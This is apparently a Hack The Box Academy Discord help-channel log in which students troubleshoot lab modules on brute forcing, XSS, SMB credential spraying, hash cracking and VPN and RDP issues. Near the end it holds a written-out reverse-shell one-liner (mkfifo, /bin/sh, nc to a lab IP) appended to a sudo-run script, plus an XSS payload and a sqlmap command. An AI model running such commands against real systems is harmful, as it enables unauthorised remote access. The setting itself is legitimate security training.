So, yesterday i found the good payload to use on vulnerablesite to callback the script from exploitserver and i got something back on the exfiltrate server. I got errors, something regarding Network

Tried that already.

try again

I see the hint about not using any port, but it says only about the exfiltrate server. Should I use the port in both other 2 URLs, but not on exfiltrate, or should I not use ports at all?

I finished AEN yesterday, have some problems maybe someone encountered them as well:

• For some reason, I had some troubles with ligolo-ng when it came to file transfers? Receiving reverse shells were no problem, but I couldn't get anything when attempting file transfer from the windows box using certutil, curl, etc
• I had to take multiple hints from the questions during the process, would dante be a good additional practice to refine methodology for cpts?

Heyo just wanted to follow up, got it in the end, looks like I misunderstood the question and in my head changed its wording. Appreciate the patience 🙂

/@cloud urchin

DM me

sup guys

Is this starting over?

no idea what you're doing

Brute forcing ftp

when asking for help make sure to include the module/section and question you're stuck on

Looking for a nudge on the Linux privesc skill assessment. For flag 4, i have the creds I think I need but they dont seem to work when logging into the application. I dont think im missing anything, Im not sure if it is a lab issue or not?

Darn it to biscuits! I'm in Documentation and Reporting, I cannot get tmux with me. I'm following the steps as outlined in the module, but it's not saving, and I can't even get the panes to split. What do?

No I think it's my vm

I always got the same problem with brute forcing

impossible to tell since you didn't include any info

Uhm okay, attacking common services - medium lab, I've tried to brute force all services which were: ssh, sftp and other 3 which I didn't brute force, . Basically brute force tools run for a ton of time and don't discover credentials with wordlist that do contain those credentials. I used hydra with pws.list file for password list and users.lisr (given in the resources of the module) for ssh and Medusa with the same files as hydra but didn't find anything so I tried with rockyou and users.list and its still running after more thsn 2 hours. Hydra for ssh has been running close to two hours

But it's not the first module that this happens, it happens a lot with all modules, it either works well immediately or sometimes it runs for hours on end and doesn't find anything or maybe it does but doesn't recognize the -f flag. Hydra is mostly like this, netexec and Medusa work better but happens with those too. The screenshot is of Medusa on sftp

sounds like you're doing something wrong then it won't take nearly that long to brute force. also how are you so sure they contain the user/password if you don't have the user/password?

I searched on the internet

could still be wrong info

the lists either don't contain the info, or you aren't using the right syntax, or maybe not even supposed to brute force at all. i'm not really sure since i didn't make notes for the medium lab.

Idk maybe but it's not the first this happens, I remember like in password attack module the password was contained in the resources but it still didn't find it after running for so long

yeah password module takes the longest by far out of any, still less than 30 min

generally bruting is going to take ~5-10 mins max

Yea sometimes for that it ran like 2 hours and then either my laptop shut off or it didn't find anything

I think I remember the syntax

Hydra -u user.list -p password.list -h IP -f - vv

Idk I think it's something like that

I'm abt to sleep

yeah that's the wrong syntax for lists, may want to review

i just completed the section, you may want to enumerate more

I'm on the Web Archives section of the Information Gathering - Web Edition module and every time I try to look at the snapshot of hackthebox from Aug 8 2018 it redirects me to Feb 10 2020. I don't know what to do

working for me, try another browser?

Does that on Firefox, Safari, and Chrome

Can't get to Aug 8 2018

It's not .com

That's your problem

ohh

what is it

Think about where HTB is based, it's a country code

Got it, thanks!

Utilize your 2 braincells competing for 10th place out of 8

dick

Proudly

Morning

Who are you trying to find?

Shall we play a Game?

No. Fuck off and read #welcome and #rules

Wauw so hostile

You believe Eye have time to read that bullshit?

If you wanna participate in the server, it takes 5 minutes at most

Tell me more

This isn't a gen chat, to have access to #general you need to follow #welcome

I tried

It looks like a gen chat... Else invite me to one

#Cicada3301

Hack the Box

LuLz

It allows me to chat... So now it's a gen chat...

That was so easy...

Not how that works

<@&861185840277487616>

You don't make the rules... Eye do...

Watch out he’s gonna take out his fedora!

No, HTB does

Hack the Box

Works for?

It's HTB server, so it's their rules, shrimple as

@shut orchid this isn't general chat, please move your conversation to #general

Pls move me to general

I don't understand your rules and how this works... So give me access to chat in general... Easy as that

So how far along are you by cracking the puzzle?

Liber Primus

Liber Primus can be found in lodge nmbr?

This takes forever...

Hack the box...

read and follow #welcome

Think outside of the box

Your welcome doesn't feel me welcomed...

any more off-topic chat will result in a mute

Bans, Censorship and Muting...

Maybe that's a Q...

Eye think it's funny... Hackers that can't hack the box...

Hi

Beginner here.
The module is XXS in bug bounty path.
What we are learning is how to identify vulnerable parameters. I tried with xsstrike and found some reflections or payloads

They all basically starts with ‘> , i understand that the tag is being closed first, as parameter is in <img src= >

I’m just trying to understand how these or any payload works

When i input the payload in the field nothing happens, it just get inserted as i can see in page source

All these payloads have () in common, does it mean that i have to insert js code in parentheses?
For example if i want it to pop with 1,
Do i have to put
<script>alert(1)</script> in parentheses?
If not how do i execute it?

Again im a beginner and your help is much appreciated 😊

Yes, it gets injected in the page source, the page interprets it as part of the source code rather than input.

The JS code doesn't go within (), it goes within the <script> tags.

☺️

Do i put the <script> tags after the payload?

Wdym?

Like append the payload with the tags

Sorry, but I'm not sure I follow. I don't understand what payload you're referring to?

Xsstrike gave me a payload declaration that a parameter is vulnerable

What does it mean?

Does it mean that only that payload would work?

Ah, I see. I'm a little rusty on XSS so bear with me if I'm wrong, but that payload should just be executed by itself. It just demonstrates that the input field is vulnerable, that's all. You can then go ahead and craft your own payload iirc.

No, I think the tool just identifies a vulnerable field for you.

So payload generation is just the sign that the parameter is vulnerable. That’s all

Yeah, the tool basically identifies the vulnerable field and is like "Hey, this field is vulnerable to this type of XSS attack. Here's a sample payload:"

But HTB academy suggests me to input the js code “with” the payload

You can then craft a payload and perform an attack based of the type of XSS.

Yes, continue on with the module, they'll introduce attacks you can carry out further in the module.

I'm assuming you're in the part of the module where they're just introducing the types of XSS and automated XSS discovery.

The next part is XSS attacks.

That is correct

Just continue on, they'll slowly introduce the attacks to you. As long as you've understood the basics they've explained, you'll be fine with the attacks.

Thanks, it’s just the they suggested to insert the payload along with the script

For now you can just stick with the basic alert command they taught you if you wanna test things out.

Basically payload is just a sign

Just a sign? 😅

Yeah. Sign that this parameter is vulnerable

Go work with this parameter

Ah, yeah, you could say that.

Well, when i insert <script> tags, the page simply renders it

It doesn’t get executed

Any idea?

Like it shows what I inserted on the page

Which section are you on and what exactly did you put in?

It’s the phishing section
ServerIp/phishing

I input the payload, nothing happens. Just gets consumed by the image tag and i see it in page source. No pop up

I input the js cosd instead of the xsstrike payload. It just prints it on the web page

No execution

This section?
https://academy.hackthebox.com/module/103/section/984

Yes

What I really need to understand is that, how to execute alert() on this page. Xsstrike gave a payload. I know where it’s inserted.
If you could just tell me how do i make it pop up with alert, it will be a huge help

And i would know everything i wanted to know about it for now

I think they provided a tip in the exercise, did you try looking at the source code after injecting a basic XSS payload to figure out how?

Yeah

It just gets printed on the screen

Well i think i should try harder, and come back 😊

Thank you for time

Would it be okay if i add you?

As a discord friend

Sure

If you still can't get it, reply to my message here or DM me and I'll give you a nudge.

Cool thanks ☺️

is anyone here who have completed password attacks -easy self assessmnet i have a doubt i solved it but i highly doubt its right approach

hi all, im russian. who can to hack a website's databases?

I've solved it but it's been forever since I did 😂

can you check your notes please?

I'll see if I have notes, but I don't think it's the "non-intended" way.

okk thankyou please do check once

Just checked my notes. I'll DM you what I did. Don't wanna include spoilers here, that ok?

yes sure please

That's what I did. Also, delete this message.

P.S. won't be DM'ing you now since we've confirmed we did it the same way 😂

okkk thankyou thats fair

Is anybody able to help with Introduction to NoSQL Injection > Skill Assessment 2

What exactly is the problem?

I think I know how it's meant to be solved, but I'm having trouble injecting to the reset token form. Tried everything from the module. Need a hint

send me a dm with what you have tried

the File Inclusion: Automated Scanning question was solved by fuzzing page parameters in search for lone parameters, not linked to any form nor user selection which is ?view=..

so the question is: how does such a case happens in real life scenario? i can't think of a web application case where there is URL based parameter isn't linked to at least user selection functionality or something..
does anyone knows a web application case where it has such feature?

I sit a lot at the academy, but last Friday I started doing boxes, so of course I started at the starting point and have now sat with it all weekend. Very fun, very educational. Perfect for interspersing what you read theoretically at the Academy with real exercises.

Hey could someone help me im doing the atacking enterirze module and in there lateral movement & pric esc section im having trouble using crackmap exec with proxychains

I have an ssh connection to the internal machine

Any help?

I suggest setting up a port forward of some form instead so you can be less restricted

Miauwdy

Someone finished the SOC course on hack the box?

Don’t ask to ask

Hey i cant seem to run crackmap exec here any help

https://github.com/Pennyw0rth/NetExec

I am having some issues with Introduction to Digital Forensics .
#Practical Digital Forensics Scenario

I think i just dont understand what the question is asking. Because i think i have found all there is to be found. But not a smoking gun kinda evidence on question 1

?

You are asking a question that you can answer yourself. But you don't want to know whether someone has completed the course. You want to know something else, right?

Yes, 843 people

thatsit, thanks

Hey

Any help why this is not working ?

Use netexec

https://academy.hackthebox.com/module/113/section/2139 Altouhgh modifying the bat file to not delete the restart.exe i have trouble finding it. The other 2 files are there though

Dear HTB team. Please update the academy modules to use nxc because all of the "just copy and paste" students are having difficulties 🙂

Ya im using it now but the comands

Netexec syntax is the same as cme

To list shares and all is different right

Here in crackmap it uses a module spider plus is that usable in netexec also

Same syntax

Oh cool it worked

use /feedback

They'll likely do a batch update

I got a json file but i cat it and its empty

Hey guys,
For a module I am required to use sqlplus tool to connect to an oracle database, but it returns an error sayinf command not found .
I tried adding the path but the tool only exists in metasploit folders, nowhere else.
And even after adding it to the path the error is not solved

Help please

Did you reload your configuration after updating your path? The changes applied to things like .bashrc will not take effect immediately and will require a terminal restart.

I did

Did you follow the install script from the section?

I did

You don't need to copy/paste it here

Run them each line by line

My bad

Sometimes the script breaks

Okay lemme give it a shot

Hey guys , I need some help in this question ( Web Requests ) pls
Use burp intruder to fuzz for .html files under the /admin directory، to find a file containing the flag.

I just don't know which word list to use, I am using Kali vm.

Have you done this module/section ? https://academy.hackthebox.com/module/113/section/2139

Yes, it sucks

Thank you haha could you give me a hand with a problem of mine?

No

I purged it from my brain

It's easier for someone to help if you provide the module/section/link etc.

I am stuck on Whitebox pentest module final assessment, question related to patching,
The Assessment requires me to submit code in a certain way.

I have sanitized and validated type and length variables inside generatePassword function.

Then I am stuck at this
Original Purpose failed message

Hey i got a sql express backup.ps1 file i used get command and it showed it got the file but cant find it anywhere on my pwn box

Hey guys , I need some help in this question ( Web Requests ) pls
Use burp intruder to fuzz for .html files under the /admin directory، to find a file containing the flag.

I just don't know which word list to use, I am using Kali vm.

Web Requests/Web Fuzzer/ Burp intruder

Use a wordlist suggested by the example

https://academy.hackthebox.com/module/163/section/1543 Having trouble grasping why is this of any use to me or if it the process of getting it what is actually useful

Banners may contain some additional info to sniff out

I just wanna say , the amount of knowledge , quality content of some modules , is impressive . Still working on bloodhound module . 31 different DACL misconfigurations/ attacks . Amazing

Can someone help me
Pls dm

No

Okay

Got the subdomains and the vhosts. But the FQDN? Isnt that whats common between all these? Like weather.bbc.com, report.bbc.com have FQDN bbc.com?

No

Fully Qualified domain name

dig bbc.com ?

Google.com is the domain name, where www.google.com is the fqdn

Translate, maps, www, scholar; all subdomains, where translate.google.com is the fqdn and so on

And how do you find the FQDN? Dig right?

Dig for each of the subdomains?

Fqdn would be like the subdomains and vhosts

The x.whatever.tld

Are a.b.whatever.tld

https://en.wikipedia.org/wiki/Fully_qualified_domain_name

Heyyy i am on Password Attacks - Med module

|| i ran a nmap scan and smb and ssh are open ||
but be it hydra or netexec or crackmapexec(which doesnt work now) nothing is working and i am stuck on the brute forcing section

Hey ! Could someone help me pls, im having issue with the web services exercice of Login Brute Force module. But im pretty sure my commands is good.
Here the host : ||deleted*|| and the command i use : ||deleted*||( try some other ports aswell, same result)

can anyone please put me upto a hint for what i am doing wrong ?

what result are you getting ?

deleted*

but with nmap i see it

try not specifying port

or run a nmap scan to see what ports are open

Already try

reset the target 2 times already

do this

i dont get why it doesn't work

you need to specify the port given

not one of the other ports, as this is a public IP:PORT

when HTB gives you a public_IP:PORT your ONLY scope is the given port

This give me this error, thats why i started looking around
||ERROR: Failed to match regex pattern within server's response.||

then that's an error with your search pattern, not with the port

he prolly used ftp -n 22

thats why the regex error

idk i never used medusa

try ssh once it will be slower but work

never needed to

i did for the sake of this module so i remem

the exercice want to get the ftp before the ssh :/

it wants creds of ftpuser

also please don't go back and delete your syntax

you need to brute force ssh session only

it's actually fairly annoying

real

That depends

also marcielle can you please help me w my issue

it will be a huge help

Srry, think its was better to remove

✨ no ✨i only hopped in here for a sec

no it is how it is in this question if i remem right we need to brute force ssh only

pwese it would take less than a min but if you are busy then ok

tbh it's been a minute for this section

..

try ssh

im on it

Not getting error so i guess this is the point

KISS; use the basic wordlists from the resources list

did it

the answer is revealed under smb

it just aint working at all like netexec says every pass is correct ✨

and hydra aint running it against smb

hydra is honestly dumb against smb

real

but netexec should get it; genuinely don't see why it wouldn't

it legit says every pass is correct i am fairly stuck

try resetting the target or contacting support

@eternal vigil I was able to get creds with CME

also crackmap goes in with throwing 100 errors and then says first is correct which is not

CME and NXC are virtually the same

well 100 errors does not sound good LMAO

Yeah, I'm aware. I just happened to use CME way back then 😂

normally cme aint working so i build it from its github and run the crackmapexec.py

makes sense

Were you there one who was having trouble with CME earlier too?

ikrr

Maybe just stick with netexec.

nope i just never use it netexec is OG

(same though)

yea but it just aint working at all

i just gotta spend the day catching back up on schoolwork that's all

got several chapters to "read" and answer questions on

@eternal vigil did you try that password?

and user?

You're on the right path from that screenshot I just saw @eternal vigil

Remove that.

your screenshot showed a different username

but the right password; if that's consolation

Yeah, the user was right, I used those creds according to my notes.

i believe if you do --shares at the end it might help determine false positives

but i could be wrong

yup and guess what it is the first user and pass on lists and if i ask netexec not to stop it says everything is correct 😭

that's why I say KISS

didnt work

Keep it simple silly

i mean i know the user i need to use and you told me the pass 🌚 but i wanna know the correct way

i mean tbh i would have just checked it on the first crack and just gone "god dammit"

i did check it but didnt work

it's not the one you copied, the screenshot you had earlier showed a different username

https://academy.hackthebox.com/module/143/section/1509 The first question, how did wley's password come about?

It said that for me too, I just went with the first one and got lucky 💀

uhhh ok maybe i am trying to establish a connection wrong then ig ?

Unfortunately I didn't save my command, for some reason, I sprayed that single password across all the users and got a bunch of positive in my notes.

ohhhh that makes sense

Netexec should work.

I don't remember why I chose that password to spray with though. However, in my notes, it seems like I only saved part of the output, so I must've tried multiple passwords. I must've used some flag to try one password at a time across all users before moving to the next one (unless it does that by default).

but it aint working its saying all passwords are correct

Maybe all passwords are correct, but not all have access to the share you need to proceed?

makes sense imma try that

yup thats what i was wondering

Can you DM your command and output?

sure

DM'd please check

who knows

Oh

I realized the issue

You're way overthinking it

If you figure out why multiple users are a success, please let me know the reason.

Vantas i can dm you i know what's going on

Oh, please do.

It's laughable simple

yea i tend to over complicate stuff sometimes

Often the correct answer is the most obvious

It's a very basic thing with SMB itself

did you actually try connecting to the SMB share with any of the "false positive" credentials? :)

I'd assumed he had so I hadn't even given the correct answer a second thought 😂

i honestly never thought of it so I brushed it off so gotta update my arcane tome

i did but i was doing it wrong bro what 😭 r1ckyr3c0n got me out of the slump , i do some super dumb mistakes ngl

if you want i can dm you the super secret that i discovered about it

yes please do

Are there any better ways for cracking a hash ?
In this module (IPMI footprinting in Pentester Path) , I retrieved the hash and am using hashcat to crack it.
It has an estimated duration of 6 days 🙂 .
Please help

well it shouldn't take 6 days

it sounds like you're trying to use the rockyou.txt

instead of the provided footprinting wordlist

from the resources button

I should use that list here as well ?

yes

Alright let me try.
Thanks marcie

typically if you're given a wordlist for the module, you use it for the whole module

Yes alright.

Plz i need help

read #rules and #welcome before engaging in stupid activities

Az

this isn't a hacker4hire server

English only server as well

English kind of book

My english is very bad

Srry

This is not the place where you can get people to hack for you

it’s ok

Ok

He left

Thanks @fathom pendant

(For pinging)

sqlmap -u 'http://SITE:PORT/case3.php' --cookie='id=2' why does it say there are no parameters found? I thought it would automatically identify id as an injectable?

id=*

I see. It sometimes can identify areas to inject automatically, when can I rely on sqlmap for it to be the case?

How do i make a wordlist containing words in small case, appear in upper case while bruteforcing with hashcat ?

just use cyberchef

Cyberchef is no help decoding IPMI hashes.
I am using Hashcat to crack this hash i obtained.
It is from the IPMI module in Footprinting Pentester Path.
The given wordlist is what i used and I could'nt crack it.
How do i do this ?

https://gchq.github.io/CyberChef/#recipe=To_Upper_case('All')&input=eW8gaW5wdSBhIGZpbGUgd2l0aCBsb3dlcmNhc2UgYW5kIGl0IHNwaXRzIG91dCB1cHBlcmNhc2U

recepie for taking lowercase to uppercase,

I converted the wordlist to uppercase and tried inputting that into hashcat but it still didn't work

Yes mate, thanks for that. I got uppercase within a sec

Ok 🙂 Then i am unsure if i can help anymore, best of luck 🙂

What about the t flag? This will toggle the case of all characters.

Toggling didn't help

I thought i couldnt get the hash because my wordlist is in lower case and the plaintext might be case sensitive.
But that wasnt it

Even with an uppercase list or mixed list

I couldn't crack the hash

In attacking common services medium lab there should be 6 open ports right? I ran nmap multiple times and I still only get 5

im having an issue with the skills assesment from information gathering, I am on question 3 What is the API key in the hidden admin directory that you have discovered on the target system?
I am trying to gobuster vhosts but I keep getting false positive results and I tried multiple wordlists

sometimes blackscreen is just screensaver, have you tried pressing enter on it?

did rdp work in other modules? you can try resetting the lab or using the pwnbox in browser that should have everything preinstalled

no results with the big list something is wrong

do you have the pwnbox powered up at the same time you're on the vpn?

yeah they use the same IP

you don't want to run them both at the same time, it'll cause connectivity issues like you described

someone pls help im going to lose my brain

I'm having an issue where RDP won't stay connected for more than 3 minutes via Windows using the VPN, requiring to shutdown and restart openvpn every time in order to reconnect. and the VPN connects from inside VM of Parrot, but unable to ping the target machine or RDP to it.

tho i can ping the targets gateway

Are you using the VPN and pwnbox at the same time?

nope

then what do you mean "the vpn connectgs from inside the vm of parrot"

i've been trying to avoid using the in browser boxes ebcause theyre nearly unusable for me

sounds like you're using the vpn with parrot

im running parrot from VMWare

ok

try killing the vpn sudo killall -9 openvpn, then terminate the target. re-download a fresh vpn file (tcp, and possibly try another reason.) after that on the page where you spawn the target press CTRL+SHIFT+R, respawn the target, reconnect to the vpn, wait 3 mins and try again

no dice.

i can connect to VPN via windows though. but the RDP connection only stays live for a about 3 mintues then i have to reset the vpn

did you try another region

also, are you using xfreerdp?

both EU and US

yes, though i can't even ping the target system

there wasn't enough time for you have done what i mentioned on both regions

that doesn't look like a target ip to me

thats its gateway

seems like something wrong with your vm then

you're on 10.10.15.x... and pinging 10.10.14.x

oh i see

yeah idk, something wrong with your vm maybe.

its the same on my host machine

makes no difference

ok in that case shut down the VM, open an administrator command prompt in Windows and type netsh i i r r and then netsh winsock reset then reboot your computer and try again

i think it's something with your vpn file, it shouldn't ping the x.x.14.x if you're on x.x.15.x

make sure to follow all the instructions precisely, kill the vpn, delete your vpn file, regenerate a new tcp VPN file in a whole new region (do these steps after the previous windows commands i gave)

Any reason the RDPs on the AD module almost always show a black screen when trying to connect via xfreerdp using openvpn?

Press space bar?

??? it worked what, can you tell me why?

because the screen was asleep, you need to wake it up

Wild, thanks i appreciate it, was getting real frustrated it

heyy i hope everyone doing fine , i have question , does the modules open with student subscription get locked after the memebrship ends ?

Yes, with the exception that if you finish the module entirely you get to keep it unlocked forever, even if they update it.

alr , thanks mate

I'm in "getting started nibbles privilege escalation", last question. When trying to run the monitor.sh file, I get 'unknown': I need something more specific. /home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found /home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found /home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found

looks to me like you're not running it correctly or the script has some problems

if you didn't touch the script it's probably not being ran correctly

I'm running: sudo /home/nibbler/personal/stuff/monitor.sh - or sudo bash /home/nibbler/personal/stuff/monitor.sh

I didn't alter the script, I just appended the reverse shell that is in the directions.

Or sometimes it asks me for a password.

well if you appended the shell you did modify it.. what was the command you used?

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.197 8080 >/tmp/f' | tee -a monitor.sh

maybe look at the script on lines 26, 36, and 43 to see what it's doing

Just some if statements, but why would the module contain a broken script?

i don't think it does

i don't know the login details to go look myself

did you make a backup copy of the file like the section said

yes